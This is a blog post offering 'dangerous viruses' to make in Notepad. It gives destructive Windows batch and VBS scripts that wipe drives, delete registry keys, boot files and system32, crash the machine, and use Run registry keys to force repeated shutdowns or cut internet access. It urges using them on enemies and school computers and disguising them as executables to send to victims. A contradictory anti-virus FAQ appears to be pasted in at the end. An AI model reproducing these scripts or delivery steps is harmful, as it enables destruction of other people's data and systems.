Pages

Created By mian soban


Computer Technology Site

Make Some Useful & Dangerous Viruses In Notepad! [Guide]

Monday, 27 April 2015



Create Your Own Viruses
Today we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers :D . Let’s get started.
How to make a virus ?
  1. Open Notepad
  2. Put The Codes Provided
  3. Save it in the correct extension
  4. Done
  • Wiper [Not Official Name But I call It]
Deletes everything in the computer’s drive



@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save As “Your File Name.bat [Batch File]
  • Registry Deleter
Deletes everything stored in registry
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
  • No Access
A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD
@echo off
Ipconfig /release
  • Shut Up
Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s
  • Crash Puter
This is simple virus that crashes the computer – [Save As Anything.VBS]
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
  • Ez Formatter
This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
  • Shutter
This virus can be very annoying it shutdowns computer every time the computer is turned on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
Now its time for few very dangerous viruses
  • Rest In Peace
It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
  • Century
Shut downs the PC hundred times. To stop Start Run and type shutdown -a . You can also change the times pc restarts by replacing 100 by your choice.
Create a new shortcut and type :-
shutdown -s -t 100 c “Installing Updates”
  • RIP -2
This virus does the same It also prevents pc from starting but in an effective and better way.
del c:\WINDOWS\system32\*.*/q
  • Freak
This virus disables the internet forever
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime :D
PAUSE

Now there are some smart guys who check the batch files in notepad before running it. No big deal. An effective way .
How to make those stuff work ?
  1. Download and run the converter.
  2. Inject your batch file
  3. Choose Icon
  4. Version and information
  5. Compile
  6. Send to your victim
  7. Enjoy :)

How do I create a computer virus?

How do I create a computer virus?

Computer VirusIf you are interested in creating a computer virus,Trojanwormmalware, or other malicious program as revenge, payback, or as a prank, we suggest you rethink. Creating a virus that deletes files or causes other issues resolves nothing and will result in prosecution by the law. In other words, you could be fined or sent to prison.
Instead of creating computer viruses or other malware, consider learning a computer programming language. You will learn a lot more by learning one or more programming languages and become more qualified in getting hired at a company that designs programs or analyzes viruses. No one ever got hired because they wrote a computer virus.

I only want to write a virus to learn how they work.

You will learn a lot more about how computer programs and viruses work by learning to program than you ever will by writing and tinkering with computer viruses. A computer virus is only a program designed to do malicious tasks on the computer, such as deleting files, inserting its code into other files, and copying itself to other places and computers accessible to the computer that is running the virus. By learning to program, you will not only know how these tasks are possible, but also learn much more.

I need to test my virus scanner.

You can create test virus files that can be used to test your computer's anti-virus scanner without having to create your own virus. See the link below for additional information and code on how to create a test virus.

If I create a good computer virus, I will be famous.

No, the only fame you may get is a brief news article or a picture of you being handcuffed and sent to prison. Once incarcerated, it will go on your record and make it next to impossible to get hired at any respectable computer company and impossible to get hired by any government agency.
If you were to write a computer virus that was successful, you would want to remain anonymous in fear of being prosecuted by the law. Also, if you think about it, almost everyone knows who Bill Gates is and what he has done for computers, but have no clue about Jeffrey Parson.

If I write a good virus, a security firm or antivirus company will hire me.

False, no respectable security firm or antivirus company wants to be affiliated with a virus or malware creator that infected potential customer computers. If you are interested in getting a job with a security firm or antivirus company, you have a much better chance learning to program, becoming a participant in security discussions, being a beta tester, or finding vulnerabilities in programs and reporting them to the developers. Companies such as Google will even pay good money to anyone who reports bugs or security vulnerabilities about any of their products.

In need details, examples, or other information about creating viruses.

Computer Hope will not send anyone any other additional information about creating computer viruses, worms, or Trojans. This document was only created to help deter people from creating computer viruses and learn computer programming instead.

What programming languages should I learn?

Programming languages such as CC++C#JavaPerlPHP, and Python are all good programming languages for new computer programmers. See the link below if you are not exactly sure what language to start learning first.
 

Most Reading